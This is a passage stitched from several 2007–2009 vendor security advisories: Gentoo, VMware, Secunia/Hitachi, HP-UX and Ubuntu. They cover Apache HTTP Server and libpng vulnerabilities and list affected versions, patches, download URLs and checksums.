has been discovered in the recall_headers() function in mod_mem_cache
(CVE-2007-1862). The mod_cache module does not properly sanitize
requests before processing them (CVE-2007-1863). The Prefork module
does not properly check PID values before sending signals
(CVE-2007-3304). The mod_proxy module does not correctly check headers
before processing them (CVE-2007-3847). 
Impact
======
A remote attacker could exploit one of these vulnerabilities to inject
arbitrary script or HTML content, obtain sensitive information or cause
a Denial of Service. 
Workaround
==========
There is no known workaround at this time. 
Resolution
==========
All Apache users should upgrade to the latest version:
    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/apache-2.0.59-r5"
References
==========
  [ 1 ] CVE-2006-5752
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752
  [ 2 ] CVE-2007-1862
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1862
  [ 3 ] CVE-2007-1863
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863
  [ 4 ] CVE-2007-3304
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304
  [ 5 ] CVE-2007-3847
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847
  [ 6 ] CVE-2007-4465
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4465
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
  http://security.gentoo.org/glsa/glsa-200711-06.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org. 
License
=======
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s). 
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. Summary
   Updated VMware Hosted products address security issues in libpng and
   the Apace HTTP Server. 
2. Relevant releases
   VMware Workstation 6.5.2 and earlier,
   VMware Player 2.5.2 and earlier,
   VMware ACE 2.5.2 and earlier
3. Problem Description
 a. Third Party Library libpng Updated to 1.2.35
    Several flaws were discovered in the way third party library libpng
    handled uninitialized pointers. An attacker could create a PNG image
    file in such a way, that when loaded by an application linked to
    libpng, it could cause the application to crash or execute arbitrary
    code at the privilege level of the user that runs the application. 
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2009-0040 to this issue. 
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available. 
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    Workstation    6.5.x     any      6.5.3 build 185404 or later
    Player         2.5.x     any      2.5.3 build 185404 or later
    ACE            2.5.x     any      2.5.3 build 185404 or later
    Server         2.x       any      patch pending
    Server         1.x       any      patch pending
    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected
    ESXi           4.0       ESXi     not affected
    ESXi           3.5       ESXi     not affected
    ESX            4.0       ESX      not affected
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected *
    * The libpng update for the Service Console of ESX 2.5.5 is
    documented in VMSA-2009-0007. 
 b. Apache HTTP Server updated to 2.0.63
    The new version of ACE updates the Apache HTTP Server on Windows
    hosts to version 2.0.63 which addresses multiple security issues
    that existed in the previous versions of this server. 
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the names CVE-2007-3847, CVE-2007-1863, CVE-2006-5752,
    CVE-2007-3304, CVE-2007-6388, CVE-2007-5000, CVE-2008-0005 to the
    issues that have been addressed by this update. 
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available. 
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    Workstation    6.5.x     any      not affected
    Player         2.5.x     any      not affected
    ACE            2.5.x     Windows  2.5.3 build 185404 or later
    ACE            2.5.x     Linux    update Apache on host system *
    Server         2.x       any      not affected
    Server         1.x       any      not affected
    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected
    ESXi           4.0       ESXi     not affected
    ESXi           3.5       ESXi     not affected
    ESX            4.0       ESX      not affected
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected
    * The Apache HTTP Server is not part of an ACE install on a Linux
    host. Update the Apache HTTP Server on the host system to version
    2.0.63 in order to remediate the vulnerabilities listed above. 
4. Solution
   Please review the patch/release notes for your product and version
   and verify the md5sum and/or the sha1sum of your downloaded file. 
   VMware Workstation 6.5.3
   ------------------------
   http://www.vmware.com/download/ws/
   Release notes:
   http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html
   For Windows
   Workstation for Windows 32-bit and 64-bit
   Windows 32-bit and 64-bit .exe
   md5sum: 7565d16b7d7e0173b90c3b76ca4656bc
   sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1
   For Linux
   Workstation for Linux 32-bit
   Linux 32-bit .rpm
   md5sum: 4d55c491bd008ded0ea19f373d1d1fd4
   sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e
   Workstation for Linux 32-bit
   Linux 32-bit .bundle
   md5sum: d4a721c1918c0e8a87c6fa4bad49ad35
   sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5
   Workstation for Linux 64-bit
   Linux 64-bit .rpm
   md5sum: 72adfdb03de4959f044fcb983412ae7c
   sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb
   Workstation for Linux 64-bit
   Linux 64-bit .bundle
   md5sum: 83e1f0c94d6974286256c4d3b559e854
   sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542
   VMware Player 2.5.3
   -------------------
   http://www.vmware.com/download/player/
   Release notes:
   http://www.vmware.com/support/player25/doc/releasenotes_player253.html
   Player for Windows binary
http://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe
   md5sum: fe28f193374c9457752ee16cd6cad4e7
   sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04
   Player for Linux (.rpm)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm
   md5sum: c99cd65f19fdfc7651bcb7f328b73bc2
   sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e
   Player for Linux (.bundle)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle
   md5sum: 210f4cb5615bd3b2171bc054b9b2bac5
   sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b
   Player for Linux - 64-bit (.rpm)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm
   md5sum: f91576ef90b322d83225117ae9335968
   sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974
   Player for Linux - 64-bit (.bundle)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle
   md5sum: 595d44d7945c129b1aeb679d2f001b05
   sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4
   VMware ACE 2.5.3
   ----------------
   http://www.vmware.com/download/ace/
   Release notes:
   http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html
   ACE Management Server Virtual Appliance
   AMS Virtual Appliance .zip
   md5sum: 44cc7b86353047f02cf6ea0653e38418
   sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1
   VMware ACE for Windows 32-bit and 64-bit
   Windows 32-bit and 64-bit .exe
   md5sum: 0779da73408c5e649e0fd1c62d23820f
   sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef
   ACE Management Server for Windows
   Windows .exe
   md5sum: 0779da73408c5e649e0fd1c62d23820f
   sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef
   ACE Management Server for SUSE Enterprise Linux 9
   SLES 9 .rpm
   md5sum: a4fc92d7197f0d569361cdf4b8cca642
   sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75
   ACE Management Server for Red Hat Enterprise Linux 4
   RHEL 4 .rpm
   md5sum: 841005151338c8b954f08d035815fd58
   sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e
5. Change log
2009-08-20  VMSA-2009-0010
Initial security advisory after release of Workstation 6.5.3,
Player 2.5.3, and ACE 2.5.3 on 2009-08-20. 
- ------------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk
E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Center
http://www.vmware.com/security
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2009 VMware Inc.  All rights reserved. 
----------------------------------------------------------------------
2003: 2,700 advisories published
2004: 3,100 advisories published
2005: 4,600 advisories published
2006: 5,300 advisories published
How do you know which Secunia advisories are important to you?
The Secunia Vulnerability Intelligence Solutions allows you to filter
and structure all the information you need, so you can address issues
effectively. 
Get a free trial of the Secunia Vulnerability Intelligence Solutions:
http://corporate.secunia.com/how_to_buy/38/vi/?ref=secadv
----------------------------------------------------------------------
TITLE:
Hitachi Web Server Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA27421
VERIFY ADVISORY:
http://secunia.com/advisories/27421/
CRITICAL:
Less critical
IMPACT:
Security Bypass, Cross Site Scripting
WHERE:
>From remote
SOFTWARE:
uCosminexus Application Server
http://secunia.com/product/13819/
Hitachi Web Server 3.x
http://secunia.com/product/13335/
Hitachi Web Server 2.x
http://secunia.com/product/13334/
Hitachi Web Server 1.x
http://secunia.com/product/13333/
DESCRIPTION:
Some vulnerabilities have been reported in the Hitachi Web Server,
which can be exploited by malicious people to bypass certain security
restrictions or conduct cross-site scripting attacks. 
1) An error exists within the handling of SSL requests. This can be
exploited to trick a vulnerable server into accepting a forged
signature. 
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor. 
ORIGINAL ADVISORY:
http://www.hitachi-support.com/security_e/vuls_e/HS07-034_e/index-e.html
http://www.hitachi-support.com/security_e/vuls_e/HS07-035_e/index-e.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01178795
Version: 1
HPSBUX02262 SSRT071447 rev. 1 - HP-UX running Apache, Remote Arbitrary Code Execution, Cross Site Scripting (XSS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. 
Release Date: 2007-10-02
Last Updated: 2007-10-02
Potential Security Impact: Remote arbitrary code execution, cross site scripting (XSS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with Apache running on HP-UX. 
References: CVE-2005-2090, CVE-2006-5752, CVE-2007-0450, CVE-2007-0774, CVE-2007-1355, CVE-2007-1358, CVE-2007-1860, CVE-2007-1863, CVE-2007-1887, CVE-2007-1900, CVE-2007-2449, CVE-2007-2450, CVE-2007-2756, CVE-2007-2872, CVE-2007-3382, CVE-2007-3385, CVE-2007-3386. 
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. 
HP-UX B.11.11, B.11.23, B.11.31 running Apache
BACKGROUND
To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed. 
AFFECTED VERSIONS 
For IPv4: 
HP-UX B.11.11 
============= 
hpuxwsAPACHE 
action: install revision A.2.0.59.00 or subsequent 
restart Apache 
URL: https://www.hp.com/go/softwaredepot/ 
For IPv6: 
HP-UX B.11.11 
HP-UX B.11.23 
HP-UX B.11.31 
============= 
hpuxwsAPACHE,revision=B.1.0.00.01 
hpuxwsAPACHE,revision=B.1.0.07.01 
hpuxwsAPACHE,revision=B.1.0.08.01 
hpuxwsAPACHE,revision=B.1.0.09.01 
hpuxwsAPACHE,revision=B.1.0.10.01 
hpuxwsAPACHE,revision=B.2.0.48.00 
hpuxwsAPACHE,revision=B.2.0.49.00 
hpuxwsAPACHE,revision=B.2.0.50.00 
hpuxwsAPACHE,revision=B.2.0.51.00 
hpuxwsAPACHE,revision=B.2.0.52.00 
hpuxwsAPACHE,revision=B.2.0.53.00 
hpuxwsAPACHE,revision=B.2.0.54.00 
hpuxwsAPACHE,revision=B.2.0.55.00 
hpuxwsAPACHE,revision=B.2.0.56.00 
hpuxwsAPACHE,revision=B.2.0.58.00 
hpuxwsAPACHE,revision=B.2.0.58.01 
action: install revision B.2.0.59.00 or subsequent 
restart Apache 
URL: https://www.hp.com/go/softwaredepot/ 
END AFFECTED VERSIONS 
RESOLUTION
HP has made the following available to resolve the vulnerability. 
HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. 
MANUAL ACTIONS: Yes - Update 
Install HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. 
PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: 
HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. 
For more information see: https://www.hp.com/go/swa 
HISTORY 
Revision: 1 (rev.1) - 02 October 2007 Initial release 
Third Party Security Patches: 
Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 
Support: For further information, contact normal HP Services support channel. 
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue. 
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save. 
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. 
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. 
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2007 Hewlett-Packard Development Company, L.P. 
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBRwVCruAfOvwtKn1ZEQK1YgCfavU7x1Hs59uLdP26lpZFwMxKofIAn3gJ
HHoe3AY1sc6hrW3Xk+B1hcbr
=+E1W
-----END PGP SIGNATURE-----
. =========================================================== 
Ubuntu Security Notice USN-499-1            August 16, 2007
apache2 vulnerabilities
CVE-2006-5752, CVE-2007-1863, CVE-2007-3304
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu. 
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
  apache2-common                           2.0.55-4ubuntu2.2
  apache2-mpm-prefork                      2.0.55-4ubuntu2.2
  apache2-mpm-worker                       2.0.55-4ubuntu2.2
Ubuntu 6.10:
  apache2-common                           2.0.55-4ubuntu4.1
  apache2-mpm-prefork                      2.0.55-4ubuntu4.1
  apache2-mpm-worker                       2.0.55-4ubuntu4.1
Ubuntu 7.04:
  apache2-mpm-prefork                      2.2.3-3.2ubuntu0.1
  apache2-mpm-worker                       2.2.3-3.2ubuntu0.1
  apache2.2-common                         2.2.3-3.2ubuntu0.1
In general, a standard system upgrade is sufficient to effect the
necessary changes. 
Details follow:
Stefan Esser discovered that mod_status did not force a character set,
which could result in browsers becoming vulnerable to XSS attacks when
processing the output.  If a user were tricked into viewing server
status output during a crafted server request, a remote attacker could
exploit this to modify the contents, or steal confidential data (such as
passwords), within the same domain.  By default, mod_status is disabled
in Ubuntu. (CVE-2006-5752)
Niklas Edmundsson discovered that the mod_cache module could be made to
crash using a specially crafted request.  A remote user could use this
to cause a denial of service if Apache was configured to use a threaded
worker.  By default, mod_cache is disabled in Ubuntu. (CVE-2007-1863)
A flaw was discovered in the signal handling of Apache.  A local
attacker could trick Apache into sending SIGUSR1 to other processes. 
The vulnerable code was only present in Ubuntu Feisty. (CVE-2007-3304)
Updated packages for Ubuntu 6.06 LTS:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.diff.gz
      Size/MD5:   115882 e94e45574e3b131d3a9a0e07e193f1e5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.dsc
      Size/MD5:     1148 c2bc143625fbf8ca59fea300845c5a42
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
      Size/MD5:  6092031 45e32c9432a8e3cf4227f5af91b03622
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.2_all.deb
      Size/MD5:  2124364 9b8ca5d5757c63f5ee6bbd507f0a8357
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   833000 be4c7770c725f5f4401ca06d1347211f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   227832 41c12dfe84f109e6544a33e4e1d791a8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   222934 7e4d072bad27239e366a6eda94c09190
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   227576 8fc59f78a3fa0e5d6dac81e875039bda
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   171082 4318f93373b705563251f377ed398614
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   171860 257f4183d70be5a00546c39c5a18f108
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:    93916 695cee55f91ceb9424abe31d8b6ee1dd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:    35902 00c1082a77ff1d863f72874c4472a26d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   285336 0a8510634b21f56f0d9619aa6fc9cec9
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   143952 d75f83ac219bce95a15a8f44b82b8ea7
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   786186 4e78fa0d438867194f66b11b4eb6fc2e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   202448 74cf60884e18c1fc93f157010a15b12c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   198456 209a0b92995fec453ed4c2c181e3e555
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   202038 6cbd437caf993fa2b2b38369cd3d5863
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   171074 0a5a26aa58af7aa2d51d1cf5d7c543d6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   171848 af9ca78febc5bc0c7936296dab958349
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:    91884 2857d60b507b28c736f83815c9f3d1b8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:    35906 202b5b233af0d26e29ca7302cf7fd04c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   261418 c90342706ac26682d15032a5ba5cb51a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   131850 951a4573901bc2f10d5febf940d57516
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   859126 afdd8642ca447fc9dc70dfed92be0fa6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   219898 6d9c9f924d2356bf9d3438a280870a7d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   215602 dd554132cdea0f860e01cf5d4e0dbc7c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   219378 7a1f4b325dacef287c901fa66680c04e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   171096 a0e2547d38ef1b84dc419d69e42ffa0b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   171864 200ab662b2c13786658486df37fda881
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   103628 ae36642fbd4698bb362fa4bf9417b0e3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:    35910 358027282f2f19451d3aa784dc0474dc
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   280950 0d9b56ec076da25e2a03f6d3c6445057
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   141074 f5d3d5e0e5911e0c0156ae55af50f87b
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   803440 d66da6a91c08956c3c5062668349ef41
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   209970 57f0a8f823a4502ee9a2608e3181cc81
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   205582 1dcfb0df796e85c409f614544ea589fe
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   209330 6bf7ae824eea35d3487febef384fce91
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   171080 1088337f4abcb6c8f65751b6120c2307
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   171868 5cda04cd73a9c6d8dfc18abd55c09ebd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:    92972 850ab3bb0904e8fe9b6255c42ba7f84c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:    35904 7af260b95c4faa17ef34810fed888caf
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   267550 08182a8a2cab00fc0e6bca2cccf5165f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   129760 a60606c6d2f12209b0bdae997be4a13f
Updated packages for Ubuntu 6.10:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.diff.gz
      Size/MD5:   116265 2732761b18dfb3c2cd1aa0b54c2cf623
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.dsc
      Size/MD5:     1148 4b9c4612469c521db0c5fdbe2f6b9b25
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
      Size/MD5:  6092031 45e32c9432a8e3cf4227f5af91b03622
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu4.1_all.deb
      Size/MD5:  2124550 8d5c30342b35f9fd595fb09d7659b6fc
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   836342 2c4ba483b0b20fdc2d43819109177941
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   227390 e61cc1998f5b8f2c44dce587e59d288a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   222376 6bdbff7f7f80fd464d1e3ec52d6e7171
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   226848 4356b4caf2b40f364c8893c41b9f9355
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   171304 c4395af051e876228541ef5b8037d979
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   172074 99dadc4ad0f0947f9368d89f4589d95a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:    94204 30f3bb8c72575fe93940ecc730b8e4b6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:    36152 ea3cbefcbee7e2f6e5555edb44733ad9
